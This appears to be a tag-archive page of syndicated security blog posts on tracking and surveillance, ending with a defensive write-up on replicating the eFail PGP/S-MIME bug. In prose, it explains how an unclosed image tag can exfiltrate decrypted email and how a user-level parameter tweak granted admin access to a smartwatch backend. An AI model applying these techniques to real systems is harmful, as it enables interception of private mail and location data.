Tag Archives: tracking

Privacy vs. Surveillance in the Age of COVID-19

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/privacy_vs_surv.html

The trade-offs are changing:

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus ­ even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale.

Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later.

I think the effects of COVID-19 will be more drastic than the effects of the terrorist attacks of 9/11: not only with respect to surveillance, but across many aspects of our society. And while many things that would never be acceptable during normal time are reasonable things to do right now, we need to makes sure we can ratchet them back once the current pandemic is over.

Cindy Cohn at EFF wrote:

We know that this virus requires us to take steps that would be unthinkable in normal times. Staying inside, limiting public gatherings, and cooperating with medically needed attempts to track the virus are, when approached properly, reasonable and responsible things to do. But we must be as vigilant as we are thoughtful. We must be sure that measures taken in the name of responding to COVID-19 are, in the language of international human rights law, “necessary and proportionate” to the needs of society in fighting the virus. Above all, we must make sure that these measures end and that the data collected for these purposes is not re-purposed for either governmental or commercial ends.

I worry that in our haste and fear, we will fail to do any of that.

More from EFF.

Build a Raspberry Pi Zero W Amazon price tracker

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/build-a-raspberry-pi-zero-w-amazon-price-tracker/

Have you ever missed out on a great deal on Amazon because you were completely unaware it existed? Are you interested in a specific item but waiting for it to go on sale? Here’s help: Devscover’s latest video shows you how to create an Amazon price tracker using Raspberry Pi Zero W and Python.

Build An Amazon Price Tracker With Python

Wayne from Devscover shows you how to code a Amazon Price Tracker with Python! Get started with your first Python project. Land a job at a big firm like Google, Facebook, Twitter or even the less well known but equally exciting big retail organisations or Government with Devscover tutorials and tips.

By following their video tutorial, you can set up a notification system on Raspberry Pi Zero W that emails you every time your chosen item’s price drops. Very nice.

Devscover’s tutorial is so detailed that it seems a waste to try and summarise it here. So instead, why not make yourself a cup of tea and sit down with the video? It’s worth the time investment: if you follow the instructions, you’ll end up with a great piece of tech that’ll save you money!

Remember, if you like what you see, subscribe to the Devscover YouTube channel and give them a thumbs-up for making wonderful Raspberry Pi content!

The post Build a Raspberry Pi Zero W Amazon price tracker appeared first on Raspberry Pi.

Apple’s Tracking-Prevention Feature in Safari has a Privacy Bug

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/02/apples_tracking.html

Last month, engineers at Google published a very curious privacy bug in Apple’s Safari web browser. Apple’s Intelligent Tracking Prevention, a feature designed to reduce user tracking, has vulnerabilities that themselves allow user tracking. Some details:

ITP detects and blocks tracking on the web. When you visit a few websites that happen to load the same third-party resource, ITP detects the domain hosting the resource as a potential tracker and from then on sanitizes web requests to that domain to limit tracking. Tracker domains are added to Safari’s internal, on-device ITP list. When future third-party requests are made to a domain on the ITP list, Safari will modify them to remove some information it believes may allow tracking the user (such as cookies).

[…]

The details should come as a surprise to everyone because it turns out that ITP could effectively be used for:

  • information leaks: detecting websites visited by the user (web browsing history hijacking, stealing a list of visited sites)
  • tracking the user with ITP, making the mechanism function like a cookie
  • fingerprinting the user: in ways similar to the HSTS fingerprint, but perhaps a bit better

I am sure we all agree that we would not expect a privacy feature meant to protect from tracking to effectively enable tracking, and also accidentally allowing any website out there to steal its visitors’ web browsing history. But web architecture is complex, and the consequence is that this is exactly the case.

Apple fixed this vulnerability in December, a month before Google published.

If there’s any lesson here, it’s that privacy is hard — and that privacy engineering is even harder. It’s not that we shouldn’t try, but we should recognize that it’s easy to get it wrong.

Customer Tracking at Ralphs Grocery Store

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/01/customer_tracki.html

To comply with California’s new data privacy law, companies that collect information on consumers and users are forced to be more transparent about it. Sometimes the results are creepy. Here’s an article about Ralphs, a California supermarket chain owned by Kroger:

…the form proceeds to state that, as part of signing up for a rewards card, Ralphs “may collect” information such as “your level of education, type of employment, information about your health and information about insurance coverage you might carry.”

It says Ralphs may pry into “financial and payment information like your bank account, credit and debit card numbers, and your credit history.”

Wait, it gets even better.

Ralphs says it’s gathering “behavioral information” such as “your purchase and transaction histories” and “geolocation data,” which could mean the specific Ralphs aisles you browse or could mean the places you go when not shopping for groceries, thanks to the tracking capability of your smartphone.

Ralphs also reserves the right to go after “information about what you do online” and says it will make “inferences” about your interests “based on analysis of other information we have collected.”

Other information? This can include files from “consumer research firms” ­– read: professional data brokers ­– and “public databases,” such as property records and bankruptcy filings.

The reaction from John Votava, a Ralphs spokesman:

“I can understand why it raises eyebrows,” he said. We may need to change the wording on the form.”

That’s the company’s solution. Don’t spy on people less, just change the wording so they don’t realize it.

More consumer protection laws will be required.

Google Receives Geofence Warrants

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/01/google_receives.html

Sometimes it’s hard to tell the corporate surveillance operations from the government ones:

Google reportedly has a database called Sensorvault in which it stores location data for millions of devices going back almost a decade.

The article is about geofence warrants, where the police go to companies like Google and ask for information about every device in a particular geographic area at a particular time. In 2013, we learned from Edward Snowden that the NSA does this worldwide. Its program is called CO-TRAVELLER. The NSA claims it stopped doing that in 2014 — probably just stopped doing it in the US — but why should it bother when the government can just get the data from Google.

Both the New York Times and EFF have written about Sensorvault.

Wi-Fi Hotspot Tracking

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/10/wi-fi_hotspot_t.html

Free Wi-Fi hotspots can track your location, even if you don’t connect to them. This is because your phone or computer broadcasts a unique MAC address.

What distinguishes location-based marketing hotspot providers like Zenreach and Euclid is that the personal information you enter in the captive portal­ — like your email address, phone number, or social media profile­ — can be linked to your laptop or smartphone’s Media Access Control (MAC) address. That’s the unique alphanumeric ID that devices broadcast when Wi-Fi is switched on.

As Euclid explains in its privacy policy, “…if you bring your mobile device to your favorite clothing store today that is a Location — ­and then a popular local restaurant a few days later that is also a Location­ — we may know that a mobile device was in both locations based on seeing the same MAC Address.”

MAC addresses alone don’t contain identifying information besides the make of a device, such as whether a smartphone is an iPhone or a Samsung Galaxy. But as long as a device’s MAC address is linked to someone’s profile, and the device’s Wi-Fi is turned on, the movements of its owner can be followed by any hotspot from the same provider.

“After a user signs up, we associate their email address and other personal information with their device’s MAC address and with any location history we may previously have gathered (or later gather) for that device’s MAC address,” according to Zenreach’s privacy policy.

The defense is to turn Wi-Fi off on your phone when you’re not using it.

EDITED TO ADD: Note that the article is from 2018. Not that I think anything is different today….

Russians Hack FBI Comms System

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/09/russians_hack_f.html

Yahoo News reported that the Russians have successfully targeted an FBI communications system:

American officials discovered that the Russians had dramatically improved their ability to decrypt certain types of secure communications and had successfully tracked devices used by elite FBI surveillance teams. Officials also feared that the Russians may have devised other ways to monitor U.S. intelligence communications, including hacking into computers not connected to the internet. Senior FBI and CIA officials briefed congressional leaders on these issues as part of a wide-ranging examination on Capitol Hill of U.S. counterintelligence vulnerabilities.

These compromises, the full gravity of which became clear to U.S. officials in 2012, gave Russian spies in American cities including Washington, New York and San Francisco key insights into the location of undercover FBI surveillance teams, and likely the actual substance of FBI communications, according to former officials. They provided the Russians opportunities to potentially shake off FBI surveillance and communicate with sensitive human sources, check on remote recording devices and even gather intelligence on their FBI pursuers, the former officials said.

It’s unclear whether the Russians were able to recover encrypted data or just perform traffic analysis. The Yahoo story implies the former; the NBC News story says otherwise. It’s hard to tell if the reporters truly understand the difference. We do know, from research Matt Blaze and others did almost ten years ago, that at least one FBI radio system was horribly insecure in practice — but not in a way that breaks the encryption. Its poor design just encourages users to turn off the encryption.

Modifying a Tesla to Become a Surveillance Platform

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/08/modifying_a_tes.html

From DefCon:

At the Defcon hacker conference today, security researcher Truman Kain debuted what he calls the Surveillance Detection Scout. The DIY computer fits into the middle console of a Tesla Model S or Model 3, plugs into its dashboard USB port, and turns the car’s built-in cameras­ — the same dash and rearview cameras providing a 360-degree view used for Tesla’s Autopilot and Sentry features­ — into a system that spots, tracks, and stores license plates and faces over time. The tool uses open source image recognition software to automatically put an alert on the Tesla’s display and the user’s phone if it repeatedly sees the same license plate. When the car is parked, it can track nearby faces to see which ones repeatedly appear. Kain says the intent is to offer a warning that someone might be preparing to steal the car, tamper with it, or break into the driver’s nearby home.

How Apple’s "Find My" Feature Works

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/06/how_apples_find.html

Matthew Green intelligently speculates about how Apple’s new “Find My” feature works.

If you haven’t already been inspired by the description above, let me phrase the question you ought to be asking: how is this system going to avoid being a massive privacy nightmare?

Let me count the concerns:

  • If your device is constantly emitting a BLE signal that uniquely identifies it, the whole world is going to have (yet another) way to track you. Marketers already use WiFi and Bluetooth MAC addresses to do this: Find My could create yet another tracking channel.
  • It also exposes the phones who are doing the tracking. These people are now going to be sending their current location to Apple (which they may or may not already be doing). Now they’ll also be potentially sharing this information with strangers who “lose” their devices. That could go badly.

  • Scammers might also run active attacks in which they fake the location of your device. While this seems unlikely, people will always surprise you.

The good news is that Apple claims that their system actually does provide strong privacy, and that it accomplishes this using clever cryptography. But as is typical, they’ve declined to give out the details how they’re going to do it. Andy Greenberg talked me through an incomplete technical description that Apple provided to Wired, so that provides many hints. Unfortunately, what Apple provided still leaves huge gaps. It’s into those gaps that I’m going to fill in my best guess for what Apple is actually doing.

On Surveillance in the Workplace

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/03/on_surveillance.html

Data & Society just published a report entitled “Workplace Monitoring & Surveillance“:

This explainer highlights four broad trends in employee monitoring and surveillance technologies:

  • Prediction and flagging tools that aim to predict characteristics or behaviors of employees or that are designed to identify or deter perceived rule-breaking or fraud. Touted as useful management tools, they can augment biased and discriminatory practices in workplace evaluations and segment workforces into risk categories based on patterns of behavior.
  • Biometric and health data of workers collected through tools like wearables, fitness tracking apps, and biometric timekeeping systems as a part of employer- provided health care programs, workplace wellness, and digital tracking work shifts tools. Tracking non-work-related activities and information, such as health data, may challenge the boundaries of worker privacy, open avenues for discrimination, and raise questions about consent and workers’ ability to opt out of tracking.

  • Remote monitoring and time-tracking used to manage workers and measure performance remotely. Companies may use these tools to decentralize and lower costs by hiring independent contractors, while still being able to exert control over them like traditional employees with the aid of remote monitoring tools. More advanced time-tracking can generate itemized records of on-the-job activities, which can be used to facilitate wage theft or allow employers to trim what counts as paid work time.

  • Gamification and algorithmic management of work activities through continuous data collection. Technology can take on management functions, such as sending workers automated “nudges” or adjusting performance benchmarks based on a worker’s real-time progress, while gamification renders work activities into competitive, game-like dynamics driven by performance metrics. However, these practices can create punitive work environments that place pressures on workers to meet demanding and shifting efficiency benchmarks.

In a blog post about this report, Cory Doctorow mentioned “the adoption curve for oppressive technology, which goes, ‘refugee, immigrant, prisoner, mental patient, children, welfare recipient, blue collar worker, white collar worker.'” I don’t agree with the ordering, but the sentiment is correct. These technologies are generally used first against people with diminished rights: prisoners, children, the mentally ill, and soldiers.

Friday Squid Blogging: A Tracking Device for Squid

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/02/friday_squid_bl_664.html

Really:

After years of “making do” with the available technology for his squid studies, Mooney created a versatile tag that allows him to research squid behavior. With the help of Kakani Katija, an engineer adapting the tag for jellyfish at California’s Monterey Bay Aquarium Research Institute (MBARI), Mooney’s team is creating a replicable system flexible enough to work across a range of soft-bodied marine animals. As Mooney and Katija refine the tags, they plan to produce an adaptable, open-source package that scientists researching other marine invertebrates can also use.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Security Flaws in Children’s Smart Watches

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/01/security_flaws_3.html

A year ago, the Norwegian Consumer Council published an excellent security analysis of children’s GPS-connected smart watches. The security was terrible. Not only could parents track the children, anyone else could also track the children.

A recent analysis checked if anything had improved after that torrent of bad press. Short answer: no.

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc. Not just Gator watches either — the same back end covered multiple brands and tens of thousands of watches

The Gator web backend was passing the user level as a parameter. Changing that value to another number gave super admin access throughout the platform. The system failed to validate that the user had the appropriate permission to take admin control!

This means that an attacker could get full access to all account information and all watch information. They could view any user of the system and any device on the system, including its location. They could manipulate everything and even change users’ emails/passwords to lock them out of their watch.

In fairness, upon our reporting of the vulnerability to them, Gator got it fixed in 48 hours.

This is a lesson in the limits of naming and shaming: publishing vulnerabilities in an effort to get companies to improve their security. If a company is specifically named, it is likely to improve the specific vulnerability described. But that is unlikely to translate into improved security practices in the future. If an industry, or product category, is named generally, nothing is likely to happen. This is one of the reasons I am a proponent of regulation.

News article.

EDITED TO ADD (2/13): The EU has acted in a similar case.

New Ways to Track Internet Browsing

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/08/new_ways_to_tra.html

Interesting research on web tracking: “Who Left Open the Cookie Jar? A Comprehensive Evaluation of Third-Party Cookie Policies:

Abstract: Nowadays, cookies are the most prominent mechanism to identify and authenticate users on the Internet. Although protected by the Same Origin Policy, popular browsers include cookies in all requests, even when these are cross-site. Unfortunately, these third-party cookies enable both cross-site attacks and third-party tracking. As a response to these nefarious consequences, various countermeasures have been developed in the form of browser extensions or even protection mechanisms that are built directly into the browser.

In this paper, we evaluate the effectiveness of these defense mechanisms by leveraging a framework that automatically evaluates the enforcement of the policies imposed to third-party requests. By applying our framework, which generates a comprehensive set of test cases covering various web mechanisms, we identify several flaws in the policy implementations of the 7 browsers and 46 browser extensions that were evaluated. We find that even built-in protection mechanisms can be circumvented by multiple novel techniques we discover. Based on these results, we argue that our proposed framework is a much-needed tool to detect bypasses and evaluate solutions to the exposed leaks. Finally, we analyze the origin of the identified bypass techniques, and find that these are due to a variety of implementation, configuration and design flaws.

The researchers discovered many new tracking techniques that work despite all existing anonymous browsing tools. These have not yet been seen in the wild, but that will change soon.

Three news articles. BoingBoing post.

Google Tracks its Users Even if They Opt-Out of Tracking

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/08/google_tracks_i.html

Google is tracking you, even if you turn off tracking:

Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude ­- accurate to the square foot -­ and save it to your Google account.

On the one hand, this isn’t surprising to technologists. Lots of applications use location data. On the other hand, it’s very surprising — and counterintuitive — to everyone else. And that’s why this is a problem.

I don’t think we should pick on Google too much, though. Google is a symptom of the bigger problem: surveillance capitalism in general. As long as surveillance is the business model of the Internet, things like this are inevitable.

BoingBoing story.

Good commentary.

Accessing Cell Phone Location Information

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/05/accessing_cell_.html

The New York Times is reporting about a company called Securus Technologies that gives police the ability to track cell phone locations without a warrant:

The service can find the whereabouts of almost any cellphone in the country within seconds. It does this by going through a system typically used by marketers and other companies to get location data from major cellphone carriers, including AT&T, Sprint, T-Mobile and Verizon, documents show.

Another article.

Boing Boing post.

Some notes on eFail

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/some-notes-on-efail.html

I’ve been busy trying to replicate the “eFail” PGP/SMIME bug. I thought I’d write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can’t read them. The bugs potentially allow eavesdroppers to take the encrypted emails they’ve captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable “external” or “remote” content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when they want to display images, but not fill up the email with them. But most of the time this is illegitimate, they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image is set to one pixel, so you don’t even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:

The problem is that as you read email messages, you often get frustrated by the fact the error messages and missing content, so you keep adding exceptions:

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren’t to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn’t matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That’s probably overkill. As long as the attacker can’t use the “remote content” in emails, you are fine. Likewise, some have recommend disabling HTML completely. That’s not even an option in any email client I’ve used — you can disable sending HTML emails, but not receiving them. It’s sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn’t replicate the direct exfiltration

There rare two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/…) but doesn’t end it. It has the starting quotes in front of the URL but no ending quotes. The ending will in the next chunk.

The next chunk isn’t HTML, though, it’s PGP. The PGP extension (in my case, Enignmail) will detect this and automatically decrypt it. In this case, it’s some previous email message I’ve received the attacker captured by eavesdropping, who then pastes the contents into this email message in order to get it decrypted.

What should happen at this point is that Thunderbird will generate a request (if “remote content” is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that’s not what happens. Instead, I get this:

I am indeed getting weird stuff in the URL (the bit after the GET /), but it’s not the PGP decrypted message. Instead what’s going on is that when Thunderbird puts together a “multipart/mixed” message, it adds it’s own HTML tags consisting of lines between each part. In the email client it looks like this:

The HTML code it adds looks like:

That’s what you see in the above URL, all this code up to the first quotes. Those quotes terminate the quotes in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have “remote content” enabled. Though, this is only according to my tests, there may be a work around to this that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via “STARTTLS”, which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.
Some organizations don’t care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won’t actively intercept STARTTLS messages, for fear of getting caught.
The consequence is that it’s much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).

You’ll know if you are getting hacked

If somebody attacks you using eFail, you’ll know. You’ll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you’ll be attacked only once — the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn’t necessarily that you’ll only get one decrypted.
As mentioned above, a lot of attackers (e.g. the NSA) won’t attack you if its so easy to get caught. Other attackers, though, like anonymous hackers, don’t care.
Somebody ought to write a plugin to Thunderbird to detect this.

Summary

It only works if attackers have already captured your emails (though, that’s why you use PGP/SMIME in the first place, to guard against that).
It only works if you’ve enabled your email client to automatically grab external/remote content.
It seems to not be easily reproducible in all cases.
Instead of disabling PGP/SMIME, you should make sure your email client hast remote/external content disabled — that’s a huge privacy violation even without this bug.

Notes: The default email client on the Mac enables remote content by default, which is bad: